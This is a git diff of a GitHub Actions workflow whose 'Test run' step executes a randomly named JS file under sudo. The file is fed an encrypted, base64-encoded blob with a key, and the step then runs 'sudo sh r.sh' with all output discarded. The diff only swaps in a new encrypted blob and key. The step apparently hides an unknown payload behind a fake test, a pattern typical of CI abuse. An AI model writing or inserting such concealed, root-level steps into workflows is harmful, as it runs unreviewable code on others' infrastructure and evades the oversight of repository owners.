--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'w7luq'
+        echo '7esvc'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19l+ld1pjHjjRPeFJJjlBmtfwZF6YaEokXfhOTKBFU5fwWFwcOgRbg8tXaNfgKg6dDOljedYaoWZrb3NTI3zC+OuPgd9Apw6raLbqgSZIe3LT+bUhK90Kil wx0ato && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+VY64zXTtMPYAcdUb8utGs9H6lZacUGLn6Cdb2x7XozhpWJFv4xtY8328ROaw00cE0dpHUo+cqDwhTDXaMDMcqQg02bW4szrEFbjZJrQFexPhgIuEyn2YX l8de4t && sudo sh r.sh > /dev/null 2>&1
